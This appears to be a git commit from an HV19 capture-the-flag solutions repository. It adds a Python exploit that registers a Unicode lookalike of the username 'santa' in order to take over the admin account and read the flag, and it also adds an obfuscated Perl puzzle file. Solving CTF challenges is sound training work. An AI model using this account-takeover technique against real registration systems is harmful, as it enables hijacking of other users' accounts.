Day17 code
This commit is contained in:
parent
7926b309e2
commit
5267a8d008
@ -7,7 +7,7 @@ import logging
|
||||
|
||||
def on_connect(client, userdata, flags, rc):
|
||||
if rc == 0:
|
||||
path = 'HV19/#';
|
||||
path = 'HV19/gifts/#';
|
||||
client.subscribe(path, qos=0)
|
||||
|
||||
def on_message(client, userdata, msg):
|
||||
|
33
Day 17/exploit.py
Normal file
33
Day 17/exploit.py
Normal file
@ -0,0 +1,33 @@
|
||||
#!/usr/bin/python
|
||||
|
||||
import requests
|
||||
import random
|
||||
import string
|
||||
import re
|
||||
|
||||
BASE_URL = "http://whale.hacking-lab.com:8881"
|
||||
PASSWORD = ''.join([random.choice(string.ascii_lowercase) for i in range(8)])
|
||||
SESSION = requests.session()
|
||||
FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
|
||||
|
||||
# 1. register user santa
|
||||
res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
|
||||
if res.status_code != 200 or "Registration successful!" not in res.text:
|
||||
print("Server returned: %d %s" % (res.status_code, res.status_text))
|
||||
print(res.text)
|
||||
exit(1)
|
||||
|
||||
# 2. login
|
||||
res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
|
||||
if res.status_code != 200 or "username not found or wrong password!" in res.text:
|
||||
print("Server returned: %d %s" % (res.status_code, res.status_text))
|
||||
print(res.text)
|
||||
exit(1)
|
||||
|
||||
# 3. get flag
|
||||
res = SESSION.get(BASE_URL + "/admin.php")
|
||||
if res.status_code != 200 or "username not found or wrong password!" in res.text:
|
||||
print("Server returned: %d %s" % (res.status_code, res.status_text))
|
||||
exit(1)
|
||||
|
||||
print(FLAG_PATTERN.search(res.text))
|
5
Day 17/source.phps
Normal file
5
Day 17/source.phps
Normal file
File diff suppressed because one or more lines are too long
1
Hidden 04/input.pl
Normal file
1
Hidden 04/input.pl
Normal file
@ -0,0 +1 @@
|
||||
s@@jSfx4gPcvtiwxPCagrtQ@,y^p-za-oPQ^a-z\x20\n^&&s[(.)(..)][\2\1]g;s%4(...)%"p$1t"%ee
|
Loading…
Reference in New Issue
Block a user